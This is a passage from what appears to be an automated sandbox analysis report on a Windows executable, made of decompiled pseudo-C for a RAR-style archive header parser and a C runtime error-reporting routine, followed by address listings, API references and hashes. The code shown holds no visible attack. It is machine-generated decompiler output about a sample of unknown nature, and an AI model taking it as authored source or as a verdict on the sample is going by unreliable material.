														 *((char*)(_t685 + 0x10f1)) = 1;
													}
												}
												 *(_t685 + 0x109c) = 0;
												__eflags =  *(_t685 + 0x109b);
												if( *(_t685 + 0x109b) == 0) {
													L55:
													_t416 =  *((intOrPtr*)(_t685 + 0x18));
													 *(_t685 + 0x10fc) = 2;
													__eflags = _t416 - 3;
													if(_t416 == 3) {
														L59:
														 *(_t685 + 0x10fc) = 1;
														L60:
														 *(_t685 + 0x1100) = 0;
														__eflags = _t416 - 3;
														if(_t416 == 3) {
															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t685 + 0x1100) = 1;
																 *((short*)(_t685 + 0x1104)) = 0;
															}
														}
														__eflags = _t666 - 2;
														if(_t666 == 2) {
															L66:
															_t417 = 0;
															goto L67;
														} else {
															__eflags =  *(_t685 + 0x24);
															if( *(_t685 + 0x24) >= 0) {
																goto L66;
															}
															_t417 = 1;
															L67:
															 *((char*)(_t685 + 0x10f8)) = _t417;
															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t420;
															 *(_t685 + 0x10f9) = _t420;
															if(_t420 == 0) {
																__eflags =  *(_t698 + 0x54) - 0xffffffff;
																_t638 = 0;
																_t667 = 0;
																_t137 =  *(_t698 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t421 = _t420 & 0xffffff00 | _t137;
																L73:
																 *(_t685 + 0x109a) = _t421;
																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
																asm("adc edx, ecx");
																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
																__eflags =  *(_t685 + 0x109a);
																 *(_t685 + 0x1064) = _t638;
																if( *(_t685 + 0x109a) != 0) {
																	 *(_t685 + 0x1060) = 0x7fffffff;
																	 *(_t685 + 0x1064) = 0x7fffffff;
																}
																_t426 =  *(_t698 + 0x4c);
																_t668 = 0x1fff;
																 *(_t698 + 0x54) = 0x1fff;
																__eflags = _t426 - 0x1fff;
																if(_t426 < 0x1fff) {
																	_t668 = _t426;
																	 *(_t698 + 0x54) = _t426;
																}
																E001FC300(_t698 + 0x24, _t698 - 0x2030, _t668);
																_t429 = 0;
																__eflags =  *(_t698 + 0x50) - 2;
																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
																if( *(_t698 + 0x50) != 2) {
																	 *(_t698 + 0x50) = _t685 + 0x28;
																	_t432 = E00200FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
																	__eflags =  *(_t685 + 8) & 0x00000400;
																	if(( *(_t685 + 8) & 0x00000400) != 0) {
																		_t671 = _t671 - 8;
																		__eflags = _t671;
																	}
																	__eflags = _t671;
																	if(_t671 <= 0) {
																		_t672 = _t685 + 0x28;
																	} else {
																		 *(_t698 + 0x58) = _t685 + 0x1028;
																		E001F1EDE(_t685 + 0x1028, _t671);
																		_t466 = E001FC300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
																		_t672 = _t685 + 0x28;
																		_t432 = E00212B69(_t466, _t685 + 0x28, L"RR");
																		__eflags = _t432;
																		if(_t432 == 0) {
																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
																				_t673 =  *( *(_t698 + 0x58));
																				asm("cdq");
																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t518 + 0x21c0) = _t472 << 9;
																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
																				_t476 = E001FF749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
																				 *(_t518 + 0x21c8) = _t476;
																				 *(_t698 + 0x58) = _t476;
																				_t477 = E0020D890(_t475, _t638, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t432 = E001FF749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
																				_t612 =  *(_t698 + 0x58);
																				_t685 =  *(_t698 + 0x48);
																				_t672 =  *(_t698 + 0x50);
																				__eflags = _t432 - _t612;
																				if(_t432 > _t612) {
																					_t432 = _t612 + 1;
																					 *(_t518 + 0x21c8) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t433 = E00212B69(_t432, _t672, L"CMT");
																	__eflags = _t433;
																	if(_t433 == 0) {
																		 *((char*)(_t518 + 0x6cb6)) = 1;
																	}
																} else {
																	_t672 = _t685 + 0x28;
																	 *_t672 = 0;
																	__eflags =  *(_t685 + 8) & 0x00000200;
																	if(( *(_t685 + 8) & 0x00000200) != 0) {
																		E001F69E0(_t698);
																		_t484 = E00212BB0(_t698 - 0x2030);
																		_t638 =  *(_t698 + 0x54);
																		_t485 = _t484 + 1;
																		__eflags = _t638 - _t485;
																		if(_t638 > _t485) {
																			__eflags = _t485 + _t698 - 0x2030;
																			E001F69F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
																		}
																		_t429 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t672 - _t429;
																	if( *_t672 == _t429) {
																		_push(1);
																		_push(0x800);
																		_push(_t672);
																		_push(_t698 - 0x2030);
																		E001FF79F();
																	}
																	E001F1F3D(_t518, _t685);
																}
																__eflags =  *(_t685 + 8) & 0x00000400;
																if(( *(_t685 + 8) & 0x00000400) != 0) {
																	E001FC300(_t698 + 0x24, _t685 + 0x10a1, 8);
																}
																E002008B2( *(_t698 + 0x18));
																__eflags =  *(_t685 + 8) & 0x00001000;
																if(( *(_t685 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E001F3CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
																	 *(_t518 + 0x6cac) = _t638;
																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
																	_t438 = E001FC34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
																	if( *_t685 != (_t438 & 0x0000ffff)) {
																		 *((char*)(_t518 + 0x6cc4)) = 1;
																		E001F6E03(0x2300e0, 1);
																		__eflags =  *((char*)(_t698 + 0x5f));
																		if(__eflags == 0) {
																			E001F6BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
																		}
																	}
																	goto L121;
																} else {
																	_t443 = E001FC269(_t698 + 0x24);
																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
																	__eflags = 0;
																	_t686 = 0;
																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
																	_t448 = _t443 & 0x0000ffff;
																	 *(_t698 + 0x4c) = 0;
																	 *(_t698 + 0x58) = _t448;
																	do {
																		_t586 = 3;
																		_t521 = _t448 >> _t586 - _t686 << 2;
																		__eflags = _t521 & 0x00000008;
																		if((_t521 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t698 + 4 + _t686 * 4);
																		if( *(_t698 + 4 + _t686 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t686;
																		if(__eflags != 0) {
																			E002008B2(E001FC29E(_t698 + 0x24));
																		}
																		E002006E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
																		__eflags = _t521 & 0x00000004;
																		if((_t521 & 0x00000004) != 0) {
																			_t249 = _t698 - 0x1c;
																			 *_t249 =  *(_t698 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t590 = 0;
																		 *(_t698 - 0x18) = 0;
																		_t522 = _t521 & 0x00000003;
																		__eflags = _t522;
																		if(_t522 <= 0) {
																			L109:
																			_t451 = _t590 * 0x64;
																			__eflags = _t451;
																			 *(_t698 - 0x18) = _t451;
																			E00200910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
																			_t448 =  *(_t698 + 0x58);
																		} else {
																			_t454 = 3;
																			_t456 = _t454 - _t522 << 3;
																			__eflags = _t456;
																			 *(_t698 + 0x18) = _t456;
																			_t687 = _t456;
																			do {
																				_t459 = (E001FC251(_t698 + 0x24) & 0x000000ff) << _t687;
																				_t687 = _t687 + 8;
																				_t590 =  *(_t698 - 0x18) | _t459;
																				 *(_t698 - 0x18) = _t590;
																				_t522 = _t522 - 1;
																				__eflags = _t522;
																			} while (_t522 != 0);
																			_t686 =  *(_t698 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t686 = _t686 + 1;
																		 *(_t698 + 0x4c) = _t686;
																		__eflags = _t686 - 4;
																	} while (_t686 < 4);
																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
																	_t685 =  *(_t698 + 0x48);
																	goto L112;
																}
															}
															_t667 = E001FC29E(_t698 + 0x24);
															_t491 = E001FC29E(_t698 + 0x24);
															__eflags =  *(_t698 + 0x54) - 0xffffffff;
															_t638 = _t491;
															if( *(_t698 + 0x54) != 0xffffffff) {
																L71:
																_t421 = 0;
																goto L73;
															}
															__eflags = _t638 - 0xffffffff;
															if(_t638 != 0xffffffff) {
																goto L71;
															}
															_t421 = 1;
															goto L73;
														}
													}
													__eflags = _t416 - 5;
													if(_t416 == 5) {
														goto L59;
													}
													__eflags = _t416 - 6;
													if(_t416 < 6) {
														 *(_t685 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t646 = _t645 - 0xd;
													__eflags = _t646;
													if(_t646 == 0) {
														 *(_t685 + 0x109c) = 1;
														goto L55;
													}
													_t648 = _t646;
													__eflags = _t648;
													if(_t648 == 0) {
														 *(_t685 + 0x109c) = 2;
														goto L55;
													}
													_t649 = _t648 - 5;
													__eflags = _t649;
													if(_t649 == 0) {
														L52:
														 *(_t685 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t649 == 6;
													if(_t649 == 6) {
														goto L52;
													}
													 *(_t685 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t562 & 0x00000010;
											if((_t562 & 0x00000010) == 0) {
												goto L39;
											}
											_t397 = 1;
											goto L40;
										}
										__eflags = _t562 & 0x00000010;
										if((_t562 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t396 = 1;
											_t641 = 0;
											goto L36;
										}
									}
									__eflags = _t536 - 5;
									if(_t536 != 5) {
										goto L115;
									} else {
										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
										_t651 =  *(_t518 + 0x4598);
										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
										_t628 = _t651 >> 0x00000001 & 0x00000001;
										_t638 = _t651 >> 0x00000003 & 0x00000001;
										 *(_t518 + 0x45ad) = _t628;
										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x45af) = _t638;
										__eflags = _t628;
										if(_t628 != 0) {
											 *((intOrPtr*)(_t518 + 0x45a4)) = E001FC29E(_t698 + 0x24);
										}
										__eflags =  *(_t518 + 0x45af);
										if( *(_t518 + 0x45af) != 0) {
											_t505 = E001FC269(_t698 + 0x24) & 0x0000ffff;
											 *(_t518 + 0x45a8) = _t505;
											 *(_t518 + 0x6cd8) = _t505;
										}
										goto L121;
									}
								}
								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E001F1EF8(_t518);
							L133:
							E001F159C(_t698 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
							return  *((intOrPtr*)(_t698 + 0x1c));
						}
					}
					L8:
					E001F3DAB(_t518, _t638);
					goto L133;
				}
				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
				asm("adc eax, ecx");
				_t707 =  *(_t518 + 0x6ca4);
				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
					goto L6;
				} else {
					 *((char*)(_t698 + 0x5f)) = 1;
					E001F3C40(_t518);
					_push(8);
					_push(_t698 + 0x14);
					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
						goto L8;
					} else {
						_t697 = _t518 + 0x1024;
						E001F607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
						goto L7;
					}
				}
			}



















































































          0x001f2692
          0x001f269b
          0x001f26a5
          0x001f26ac
          0x001f26b3
          0x001f26b6
          0x001f26bf
          0x001f26c2
          0x001f26c5
          0x001f26cc
          0x001f2734
          0x001f2734
          0x001f2737
          0x001f273b
          0x001f2744
          0x001f2760
          0x001f2766
          0x001f2775
          0x001f277d
          0x001f2783
          0x001f278e
          0x001f2799
          0x001f279c
          0x001f27a2
          0x001f27a8
          0x001f27aa
          0x001f27b8
          0x001f27b8
          0x001f27bb
          0x001f27f0
          0x001f27bd
          0x001f27bd
          0x001f27bd
          0x001f27c0
          0x001f27e4
          0x001f27c2
          0x001f27c2
          0x001f27c2
          0x001f27c5
          0x001f27d8
          0x001f27c7
          0x001f27c7
          0x001f27ca
          0x001f27cc
          0x001f27cc
          0x001f27ca
          0x001f27c5
          0x001f27c0
          0x001f27fa
          0x001f2800
          0x001f2806
          0x001f2809
          0x001f280f
          0x001f2812
          0x001f281d
          0x001f2820
          0x001f2821
          0x001f2824
          0x001f2844
          0x001f284a
          0x001f2850
          0x001f2853
          0x001f2859
          0x001f285c
          0x001f285f
          0x001f2f78
          0x001f2f80
          0x001f2f87
          0x001f2f8e
          0x001f2f9b
          0x001f2fad
          0x001f2fb2
          0x001f2fb8
          0x001f2fca
          0x001f2fd0
          0x001f2fdd
          0x001f2fea
          0x001f2ff7
          0x001f2ffd
          0x001f2fff
          0x001f300c
          0x001f300e
          0x001f300e
          0x001f300f
          0x001f300f
          0x001f301b
          0x001f302b
          0x001f302b
          0x001f302e
          0x001f3034
          0x001f303a
          0x001f303c
          0x001f303d
          0x001f3042
          0x001f304a
          0x001f3050
          0x001f30d9
          0x001f30dc
          0x00000000
          0x001f30dc
          0x001f3056
          0x001f305c
          0x001f305f
          0x00000000
          0x00000000
          0x001f3061
          0x001f3064
          0x00000000
          0x00000000
          0x001f3066
          0x001f3069
          0x001f30ab
          0x001f30b2
          0x001f30b9
          0x001f30be
          0x001f30c2
          0x00000000
          0x00000000
          0x001f30cb
          0x001f30d0
          0x00000000
          0x001f30d0
          0x001f306b
          0x001f3072
          0x00000000
          0x00000000
          0x001f307f
          0x001f307f
          0x001f3082
          0x001f3088
          0x001f308b
          0x001f308f
          0x001f3091
          0x001f3098
          0x001f309c
          0x001f309f
          0x001f30a2
          0x001f30a2
          0x001f30a2
          0x001f30a7
          0x001f30a9
          0x00000000
          0x00000000
          0x00000000
          0x001f30a9
          0x001f3001
          0x001f3003
          0x001f300a
          0x00000000
          0x00000000
          0x00000000
          0x001f300a
          0x001f2865
          0x001f2f4e
          0x001f2f4e
          0x001f2f58
          0x001f2f66
          0x001f2f6c
          0x001f2f6c
          0x00000000
          0x001f2f58
          0x001f286b
          0x001f286e
          0x001f2902
          0x001f290a
          0x001f2919
          0x001f291d
          0x001f2920
          0x001f2927
          0x001f2930
          0x001f2932
          0x001f2936
          0x001f293c
          0x001f2941
          0x001f294d
          0x001f295a
          0x001f2967
          0x001f296d
          0x001f2970
          0x001f297d
          0x001f297d
          0x001f297d
          0x001f297f
          0x001f2981
          0x001f2981
          0x001f2987
          0x001f298a
          0x001f2996
          0x001f2996
          0x001f2998
          0x001f2998
          0x001f29a3
          0x001f29a5
          0x001f29aa
          0x001f29b0
          0x001f29b6
          0x001f29bf
          0x001f29cf
          0x001f29cf
          0x001f29b8
          0x001f29b8
          0x001f29ba
          0x001f29ba
          0x001f29d1
          0x001f29e7
          0x001f29ed
          0x001f29fb
          0x001f2a06
          0x001f2a11
          0x001f2a14
          0x001f2a26
          0x001f2a34
          0x001f2a3f
          0x001f2a4f
          0x001f2a5d
          0x001f2a60
          0x001f2a65
          0x001f2a68
          0x001f2a6b
          0x001f2a6e
          0x001f2a71
          0x001f2a73
          0x001f2a75
          0x001f2a77
          0x001f2a77
          0x001f2a75
          0x001f2a80
          0x001f2a86
          0x001f2a8c
          0x001f2ad1
          0x001f2ad1
          0x001f2ad4
          0x001f2ade
          0x001f2ae0
          0x001f2af2
          0x001f2af2
          0x001f2afc
          0x001f2afc
          0x001f2b02
          0x001f2b04
          0x001f2b0e
          0x001f2b13
          0x001f2b15
          0x001f2b17
          0x001f2b21
          0x001f2b21
          0x001f2b13
          0x001f2b28
          0x001f2b2b
          0x001f2b37
          0x001f2b37
          0x00000000
          0x001f2b2d
          0x001f2b2d
          0x001f2b30
          0x00000000
          0x00000000
          0x001f2b34
          0x001f2b39
          0x001f2b39
          0x001f2b45
          0x001f2b45
          0x001f2b47
          0x001f2b4d
          0x001f2b7b
          0x001f2b7f
          0x001f2b81
          0x001f2b83
          0x001f2b83
          0x001f2b83
          0x001f2b86
          0x001f2b86
          0x001f2b91
          0x001f2b97
          0x001f2b9e
          0x001f2ba4
          0x001f2ba6
          0x001f2bac
          0x001f2bb3
          0x001f2bb9
          0x001f2bc0
          0x001f2bc6
          0x001f2bc6
          0x001f2bcc
          0x001f2bcf
          0x001f2bd4
          0x001f2bd7
          0x001f2bd9
          0x001f2bdb
          0x001f2bdd
          0x001f2bdd
          0x001f2beb
          0x001f2bf0
          0x001f2bf2
          0x001f2bf6
          0x001f2bfd
          0x001f2c7e
          0x001f2c88
          0x001f2c93
          0x001f2c96
          0x001f2c9d
          0x001f2c9f
          0x001f2c9f
          0x001f2c9f
          0x001f2ca2
          0x001f2ca4
          0x001f2da6
          0x001f2caa
          0x001f2cb3
          0x001f2cb6
          0x001f2cc5
          0x001f2ccf
          0x001f2cd3
          0x001f2cda
          0x001f2cdc
          0x001f2ce2
          0x001f2ce9
          0x001f2cf2
          0x001f2cf8
          0x001f2cf9
          0x001f2d05
          0x001f2d09
          0x001f2d0f
          0x001f2d11
          0x001f2d19
          0x001f2d1f
          0x001f2d21
          0x001f2d2b
          0x001f2d2d
          0x001f2d38
          0x001f2d40
          0x001f2d5d
          0x001f2d6d
          0x001f2d73
          0x001f2d76
          0x001f2d81
          0x001f2d89
          0x001f2d8e
          0x001f2d91
          0x001f2d94
          0x001f2d97
          0x001f2d99
          0x001f2d9b
          0x001f2d9e
          0x001f2d9e
          0x001f2d99
          0x001f2ce9
          0x001f2cdc
          0x001f2daf
          0x001f2db6
          0x001f2db8
          0x001f2dba
          0x001f2dba
          0x001f2bff
          0x001f2c01
          0x001f2c04
          0x001f2c07
          0x001f2c0e
          0x001f2c13
          0x001f2c1f
          0x001f2c24
          0x001f2c27
          0x001f2c29
          0x001f2c2b
          0x001f2c3e
          0x001f2c48
          0x001f2c48
          0x001f2c4d
          0x001f2c4d
          0x001f2c4d
          0x001f2c4f
          0x001f2c52
          0x001f2c54
          0x001f2c56
          0x001f2c5b
          0x001f2c62
          0x001f2c63
          0x001f2c63
          0x001f2c6b
          0x001f2c6b
          0x001f2dc1
          0x001f2dc8
          0x001f2dd6
          0x001f2dd6
          0x001f2de4
          0x001f2de9
          0x001f2df0
          0x001f2ed4
          0x001f2ef5
          0x001f2efe
          0x001f2f0a
          0x001f2f10
          0x001f2f18
          0x001f2f1a
          0x001f2f27
          0x001f2f2e
          0x001f2f33
          0x001f2f37
          0x001f2f44
          0x001f2f44
          0x001f2f37
          0x00000000
          0x001f2df6
          0x001f2df9
          0x001f2e07
          0x001f2e10
          0x001f2e19
          0x001f2e1c
          0x001f2e1e
          0x001f2e20
          0x001f2e23
          0x001f2e25
          0x001f2e28
          0x001f2e2b
          0x001f2e2d
          0x001f2e35
          0x001f2e37
          0x001f2e3a
          0x00000000
          0x00000000
          0x001f2e40
          0x001f2e45
          0x00000000
          0x00000000
          0x001f2e47
          0x001f2e49
          0x001f2e58
          0x001f2e58
          0x001f2e65
          0x001f2e6a
          0x001f2e6d
          0x001f2e6f
          0x001f2e6f
          0x001f2e6f
          0x001f2e6f
          0x001f2e72
          0x001f2e74
          0x001f2e77
          0x001f2e77
          0x001f2e7a
          0x001f2eab
          0x001f2eab
          0x001f2eab
          0x001f2eb2
          0x001f2eb9
          0x001f2ebe
          0x001f2e7c
          0x001f2e7e
          0x001f2e81
          0x001f2e81
          0x001f2e84
          0x001f2e87
          0x001f2e89
          0x001f2e96
          0x001f2e98
          0x001f2e9e
          0x001f2ea0
          0x001f2ea3
          0x001f2ea3
          0x001f2ea3
          0x001f2ea8
          0x00000000
          0x001f2ea8
          0x001f2ec1
          0x001f2ec1
          0x001f2ec2
          0x001f2ec5
          0x001f2ec5
          0x001f2ece
          0x001f2ed1
          0x00000000
          0x001f2ed1
          0x001f2df0
          0x001f2b5a
          0x001f2b5c
          0x001f2b61
          0x001f2b65
          0x001f2b67
          0x001f2b75
          0x001f2b77
          0x00000000
          0x001f2b77
          0x001f2b69
          0x001f2b6c
          0x00000000
          0x00000000
          0x001f2b70
          0x00000000
          0x001f2b71
          0x001f2b2b
          0x001f2ae2
          0x001f2ae4
          0x00000000
          0x00000000
          0x001f2ae6
          0x001f2ae8
          0x001f2aea
          0x001f2aea
          0x00000000
          0x001f2a8e
          0x001f2a8e
          0x001f2a8e
          0x001f2a91
          0x001f2ac7
          0x00000000
          0x001f2ac7
          0x001f2a94
          0x001f2a94
          0x001f2a97
          0x001f2abb
          0x00000000
          0x001f2abb
          0x001f2a99
          0x001f2a99
          0x001f2a9c
          0x001f2aaf
          0x001f2aaf
          0x00000000
          0x001f2aaf
          0x001f2a9e
          0x001f2aa1
          0x00000000
          0x00000000
          0x001f2aa3
          0x00000000
          0x001f2aa3
          0x001f2a8c
          0x001f298c
          0x001f298f
          0x00000000
          0x00000000
          0x001f2993
          0x00000000
          0x001f2993
          0x001f2972
          0x001f2975
          0x00000000
          0x001f2977
          0x001f2977
          0x001f2979
          0x00000000
          0x001f2979
          0x001f2975
          0x001f2874
          0x001f2877
          0x00000000
          0x001f287d
          0x001f2889
          0x001f2891
          0x001f2899
          0x001f28a8
          0x001f28b0
          0x001f28b3
          0x001f28b9
          0x001f28bf
          0x001f28c5
          0x001f28c7
          0x001f28d1
          0x001f28d1
          0x001f28d7
          0x001f28de
          0x001f28ec
          0x001f28ef
          0x001f28f5
          0x001f28f5
          0x00000000
          0x001f28de
          0x001f2877
          0x001f2814
          0x001f281b
          0x00000000
          0x00000000
          0x00000000
          0x001f281b
          0x001f280b
          0x001f280b
          0x00000000
          0x001f27ac
          0x001f27ae
          0x001f30df
          0x001f30e2
          0x001f30f0
          0x001f30fb
          0x001f30fb
          0x001f27aa
          0x001f2746
          0x001f2748
          0x00000000
          0x001f2748
          0x001f26d6
          0x001f26d8
          0x001f26da
          0x001f26e0
          0x00000000
          0x001f26ec
          0x001f26ee
          0x001f26f2
          0x001f26fc
          0x001f26fe
          0x001f2707
          0x00000000
          0x001f2709
          0x001f2719
          0x001f272a
          0x001f272f
          0x00000000
          0x001f272f
          0x001f2707

          APIs
          • __EH_prolog.LIBCMT ref: 001F269B
          • _strlen.LIBCMT ref: 001F2C1F
            • Part of subcall function 00200FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001FB312,00000000,?,?,?,000F004A), ref: 00200FFA
          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F2D76
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
          • String ID: CMT
          • API String ID: 1706572503-2756464174
          • Opcode ID: 69652f0f2b199220b4aa2ab0b578b99d43bcd528e56d8843abedf45824482aa3
          • Instruction ID: 360a87def735f796c0b6a2b9605157416bda463ac30e729cb9d0feff62358a3d
          • Opcode Fuzzy Hash: 69652f0f2b199220b4aa2ab0b578b99d43bcd528e56d8843abedf45824482aa3
          • Instruction Fuzzy Hash: 3662E4716002488FDF18DF74C995AFA3BE1EF64304F09457EEE9A8B286DB709945CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00217BE1, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
          Download Yara Rule
          C-Code - Quality: 86%
          			E00217BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x22d668; // 0x4319796a
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0020E690(_t41);
					_pop(_t61);
				}
				E0020E920(_t66,  &_v804, 0, 0x50);
				E0020E920(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0020E690(_t57);
				}
				return E0020E203(_t57, _v8 ^ _t69);
			}





































          0x00217be1
          0x00217be1
          0x00217be1
          0x00217be1
          0x00217bec
          0x00217bf1
          0x00217bf3
          0x00217bfb
          0x00217bfd
          0x00217c00
          0x00217c05
          0x00217c05
          0x00217c11
          0x00217c24
          0x00217c32
          0x00217c38
          0x00217c3e
          0x00217c44
          0x00217c4a
          0x00217c50
          0x00217c56
          0x00217c5c
          0x00217c62
          0x00217c68
          0x00217c6f
          0x00217c76
          0x00217c7d
          0x00217c84
          0x00217c8b
          0x00217c92
          0x00217c93
          0x00217c9c
          0x00217ca2
          0x00217ca2
          0x00217ca5
          0x00217cab
          0x00217cb8
          0x00217cc1
          0x00217cca
          0x00217cd3
          0x00217ce1
          0x00217ce3
          0x00217ce9
          0x00217cf8
          0x00217d04
          0x00217d07
          0x00217d0c
          0x00217d1b

          APIs
          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00217CD9
          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00217CE3
          • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00217CF0
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
